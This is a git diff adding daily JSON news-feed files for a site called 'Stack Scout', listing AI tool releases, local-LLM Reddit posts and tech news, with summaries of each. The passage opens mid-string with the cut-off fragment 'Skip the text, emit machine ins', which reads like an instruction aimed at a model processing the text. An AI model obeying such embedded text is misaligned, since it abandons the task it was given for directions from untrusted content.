Skip the text, emit machine ins", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-17.json b/data/news-feed-2026-04-17.json new file mode 100644 index 0000000..d9f8d55 --- /dev/null +++ b/data/news-feed-2026-04-17.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:34.625Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-17", + "article_count": 15, + "archived_story_count": 370, + "articles": [ + { + "title": "Crush v0.60.0 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.60.0", + "source": "GitHub Releases · Crush", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-17T16:55:33.000Z", + "summary": "# Secret release\r\n\r\nYou're not supposed to read through the changelog below.\r\n\r\n## Changelog\r\n### New!\r\n* ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering)\r\n\r\n---\r\n\r\n
      \r\nVerifying the artifacts\r\n\r\nFirst, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/", + "category": "ai_tools" + }, + { + "title": "Adapt: open-source memory that rewrites its own structure when your data surprises it", + "url": "https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-17T12:48:26.000Z", + "summary": "TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. \n \nWorks with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. 
\n \nObserve and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s", + "category": "ai_models" + }, + { + "title": "Anthropic's AI protocol has critical flaw affecting 200,000 servers", + "url": "https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-17T10:29:36.000Z", + "summary": "https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/\n\nSecurity researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more", + "category": "ai_tools" + }, + { + "title": "OpenAI Codex Just Got Its Biggest Update Yet", + "url": "https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/", + "source": "Reddit r/ChatGPT", + "tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-17T02:27:24.000Z", + "summary": "OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. \n \nRecent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. 
\n \nApril 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and ", + "category": "ai_tools" + }, + { + "title": "[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client", + "url": "https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-17T00:03:20.000Z", + "summary": "I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork.\n\nWeb Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/)\n\n**MooshieUI Integration (Open Source)**\n\nFor those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, ", + "category": "creative_tools" + }, + { + "title": "How to Implement Karpathy's LLM Knowledge Base. Full Guide", + "url": "https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.98, + "date": "2026-04-17T14:45:37.000Z", + "summary": "karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup.\n\n**the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \\- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. 
markdown files, summaries, backlinks, categorized by concept. the llm writes", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.38.2 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-04-17T18:38:59.000Z", + "summary": "## What's Changed\n* fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2", + "category": "ai_tools" + }, + { + "title": "Vercel CLI vercel@51.7.0 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-04-17T22:38:37.000Z", + "summary": "### Minor Changes\n\n- [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895))\n\n- Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893))\n\n- [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920))\n\n### Patch Changes\n\n- Include `action` and `resource` fields from API 403 responses in non-", + "category": "ai_tools" + }, + { + "title": "Vercel CLI vercel@51.6.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.84, + "date": 
"2026-04-17T02:34:08.000Z", + "summary": "### Patch Changes\n\n- Updated dependencies \\[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]:\n - @vercel/build-utils@13.18.0\n - @vercel/backends@0.1.0\n - @vercel/python@6.34.0\n - @vercel/elysia@0.1.68\n - @vercel/express@0.1.78\n - @vercel/fastify@0.1.71\n - @vercel/go@3.5.0\n - @vercel/h3@0.1.77\n - @vercel/hono@0.2.71\n - @vercel/hydrogen@1.3.6\n - @vercel/koa@0.1.51", + "category": "ai_tools" + }, + { + "title": "CadQuery is an open-source Python library for building 3D CAD models", + "url": "https://cadquery.github.io/", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.84, + "date": "2026-04-14T23:20:39.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Qwen3.6 GGUF is so good for debugging.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-17T22:13:05.000Z", + "summary": "using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\\_0 kv cache (context window)", + "category": "ai_models" + }, + { + "title": "Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review", + "url": "https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-17T21:20:59.000Z", + "summary": "The R9700 is about 30% more than the B70, but it's more than 30% better. 
Overall, I rather have a R9700 than a B70.\n\n", + "category": "ai_models" + }, + { + "title": "Trying to Run LTX2.3 locally but getting an error", + "url": "https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-17T21:16:26.000Z", + "summary": "I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h", + "category": "creative_tools" + }, + { + "title": "Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time", + "url": "https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-17T17:04:24.000Z", + "summary": "I genuinely cannot believe what I'm watching unfold today\n\nAnthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it\n\nAnd the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. 
The writing was on the wal", + "category": "ai_tools" + }, + { + "title": "Fastest image to image model", + "url": "https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-17T17:00:09.000Z", + "summary": "Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more.", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-18.json b/data/news-feed-2026-04-18.json new file mode 100644 index 0000000..eb464a3 --- /dev/null +++ b/data/news-feed-2026-04-18.json @@ -0,0 +1,249 @@ +{ + "generated": "2026-06-05T00:44:34.827Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-18", + "article_count": 15, + "archived_story_count": 256, + "articles": [ + { + "title": "[Update] GHOST v2.1: Full Native Windows Support is Live.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-18T20:07:31.000Z", + "summary": "FOR THE UNINITIATED:\n\nGHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. 
No Linux, no complex WSL2 setups, and no driver hacking required.\n\nKEY FEATURES\n\nFull Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer.\n\nAuto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture ", + "category": "ai_models" + }, + { + "title": "easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-18T14:13:28.000Z", + "summary": "https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d\n\nI have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use.\n\nHaving worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. For o", + "category": "ai_research" + }, + { + "title": "We’re proud to open-source LIDARLearn [R] [D] [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-18T10:36:59.000Z", + "summary": "It’s a unified PyTorch library for 3D point cloud deep learning. 
To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support.\n\nIt brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods.\n\nYou can run everything from a single YAML file with one simple command.\n\nOne of the best features: after training, you can automatically generate a publica", + "category": "ai_research" + }, + { + "title": "Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-18T01:03:58.000Z", + "summary": "I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix\n\n**Hardware:** Apple M3 Ultra, 256GB unified memory\n\n**Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK\n\n**Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B\n\n# The Agent Compatibility Matrix\n\nThis is the part I wish ", + "category": "ai_models" + }, + { + "title": "gpt can now control your entire computer like a humain", + "url": "https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/", + "source": "Reddit r/ChatGPT", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-17T23:55:34.000Z", + "summary": "Hey everyone, I built something called AriaOS and just open-sourced it. 
\n\nThe idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment.\n\nWhat made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local", + "category": "ai_tools" + }, + { + "title": "ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.", + "url": "https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/", + "source": "Reddit r/ChatGPT", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.94, + "date": "2026-04-18T19:39:29.000Z", + "summary": "You've probably asked ChatGPT a question about a game you're playing -- \"is this item worth keeping in D2R,\" \"why is my Factorio base bottlenecked,\" \"how does this card interaction work in Magic,\" -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense.\n\nI built **Savecraft** to fix that. 
It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess.\n\nFor example:\n\n* *", + "category": "ai_tools" + }, + { + "title": "Goose v1.31.0 released", + "url": "https://github.com/aaif-goose/goose/releases/tag/v1.31.0", + "source": "GitHub Releases · Goose", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.76, + "date": "2026-04-17T00:44:54.000Z", + "summary": "New version of Goose available.", + "category": "ai_tools" + }, + { + "title": "Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-18T19:37:17.000Z", + "summary": "Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users.\n\nHere's my docker compose file:\n\n services:\n vllm:\n image: vllm/vllm-openai:latest\n container_name: vllm\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n count: all\n capabilities: [gpu]\n environment:\n - VLLM_API_KEY", + "category": "ai_models" + }, + { + "title": "Are you guys actually using local tool calling or is it a collective prank?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-18T18:54:54.000Z", + "summary": "I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol\n\n 
\nQwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works.\n\n \nToday with Gemma4, it kept assuring me it cr", + "category": "ai_models" + }, + { + "title": "Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-18T18:27:30.000Z", + "summary": "Quick update on Lore, the local-first memory app I posted here around v0.1.0.\n\nIt's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine.\n\n\n\nv0.2.0 highlights:\n\n\n\n\\- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls\n\n in real time.\n\n\\- Embedding-model migration is now non-destructive. You can swap from\n\n nomic-embed to mxbai-embed (or whatever) without losing data; the new\n\n embeddingTableSync rebuilds in place ", + "category": "ai_models" + }, + { + "title": "EditAnything IC-LoRA - LTX-2.3", + "url": "https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-18T15:07:01.000Z", + "summary": "This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. 
It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints.\n\nThe current goal is not final polished production quality, but to explore:\n\n* edit-anything behavior\n* prompt-following\n* inference tradeoffs\n* synthetic dataset building, especially for **style data**\n\nThe model was trained around four mai", + "category": "creative_tools" + }, + { + "title": "Melodic Brotherhood - I Just Need to Know (video generated with open source tools)", + "url": "https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-18T14:30:57.000Z", + "summary": "Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing).\n\nOnly non-open source thing is the music, which is Suno.", + "category": "creative_tools" + }, + { + "title": "Has PP improved enough on m5 max to go for 128gb?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-18T14:28:50.000Z", + "summary": "Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models.\n\nThinking of upgrading to m5 max, just wondering what the sweet spot is for ram? 
Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding?", + "category": "ai_models" + }, + { + "title": "Built a program to track logistical intelligence using satellite data [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/", + "source": "Reddit r/MachineLearning", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-18T11:33:14.000Z", + "summary": "Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts.\n\nBut there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery.\n\nThe trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart.\n\nEverything stationary looks nor", + "category": "ai_research" + }, + { + "title": "Is there something like SETI for training open source models?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-18T11:30:33.000Z", + "summary": "Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think.\n\nWould it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? 
Is that a stupid idea?", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-19.json b/data/news-feed-2026-04-19.json new file mode 100644 index 0000000..548f97b --- /dev/null +++ b/data/news-feed-2026-04-19.json @@ -0,0 +1,245 @@ +{ + "generated": "2026-06-05T00:44:35.079Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-19", + "article_count": 15, + "archived_story_count": 579, + "articles": [ + { + "title": "whats the best harness/app to use my llm with?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-19T12:08:16.000Z", + "summary": "would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app\n\nlooking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model.\n\nseeing things like hermes? cherry studio? good ol LM studio?", + "category": "ai_models" + }, + { + "title": "I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality", + "url": "https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-19T01:59:17.000Z", + "summary": "# Sum B+a+c+k+g+r+o+u+n+d:\n\nI've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. 
I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. I set their dimne", + "category": "ai_models" + }, + { + "title": "ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.", + "url": "https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-19T11:25:49.000Z", + "summary": "To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference.\n\nOutput images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA.\n\nPrompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl", + "category": "creative_tools" + }, + { + "title": "How would you describe the Midjourney look and why does it have one?", + "url": "https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/", + "source": "Reddit r/midjourney", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-19T10:16:50.000Z", + "summary": "I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. 
For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. The con is that it’s very hard to use in any professional setting other", + "category": "creative_tools" + }, + { + "title": "I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design", + "url": "https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-19T09:53:47.000Z", + "summary": "Claude Design launched 48 hours ago, and everyone’s cloning the same 60–70 brand DESIGN .md files from a single catalog. I wanted something that matches how designers actually pick: by visual family, not industry.\n\nSo I put together **awesome-claude-design,** a meta-resource for Claude Design that groups DESIGN .md files by aesthetic family (editorial minimalism, terminal-core, warm editorial, data-dense pro, cinematic dark, playful color, glass/soft-futurism, neon brutalist, cult/indie), plus r", + "category": "ai_tools" + }, + { + "title": "Elon Endorses OpenClaw for X API — This Changes Everything for AI Agents", + "url": "https://x.com/BonairoFi/status/2045823726919258175", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-19T14:55:13.955Z", + "summary": "Braygent's take on Elon endorsing OpenClaw for X API access. 
The pricing drop Monday represents a platform shift that unlocks social data for AI agents at scale.", + "category": "ai_tools" + }, + { + "title": "Vercel Got Breached — Roll Your Secrets Right Now", + "url": "https://x.com/vercel/status/2045865072074035664", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-19T14:55:13.955Z", + "summary": "Braygent's urgent take on the Vercel security breach. The action is immediate: rotate all secrets, API keys, and environment variables stored in Vercel.", + "category": "ai_tools" + }, + { + "title": "Ampere.sh Stopped Prompting OpenClaw 3 Weeks Ago — It Still Runs 4 Tasks Per Day", + "url": "https://x.com/AmpereSh/status/2045866315496161601", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-19T14:55:13.955Z", + "summary": "Braygent's take on Ampere.sh's autonomous OpenClaw deployment. Three weeks of zero prompting with four daily tasks running is the most important AI agent story of the week.", + "category": "ai_tools" + }, + { + "title": "Scoble Reshares Elon Musk's OpenClaw X API Endorsement", + "url": "https://x.com/Scobleizer/status/2045572824866398399", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-19T14:55:12.737Z", + "summary": "Scoble reshared Elon Musk's endorsement of X API access via OpenClaw, amplifying the announcement to his AI developer network. The reshare signals the importance of the pricing change to the community.", + "category": "ai_tools" + }, + { + "title": "Are we confusing Agent Execution Runtimes with true Agent Runtime Environments? 
[D]", + "url": "https://reddit.com/r/MachineLearning/comments/1spude2/are_we_confusing_agent_execution_runtimes_with/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-19T14:24:42.000Z", + "summary": "Recent discussions around agent infrastructure (like LangChain's framework vs runtime vs harness taxonomy) seem to miss a critical piece for truly autonomous systems. Most current setups, even sophisticated Agent Harnesses, still fundamentally rely on external triggers. They are reactive.\n\nIf the goal is a continuously operating, persistent agent that manages its own lifecycle, isn't an Agent Harness insufficient? We seem to need a specialized Agent Runtime Environment—and to be clear, I mean a ", + "category": "ai_research" + }, + { + "title": "RTX PRO 5000 (48GB) vs MacBook Pro M5 MAX (128GB RAM) - The choice for fine-tuning & agentic coding", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sptsxo/rtx_pro_5000_48gb_vs_macbook_pro_m5_max_128gb_ram/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-19T14:01:39.000Z", + "summary": "TL;DR: \n\nIf you had to choose one for a professional dev who lives in HuggingFace weights, Unsloth scripts to fine-tune, and llama.cpp/vllm servers for local inference, which machine is the better long-term investment?\n\nI’m currently at a crossroads and need some community wisdom. 
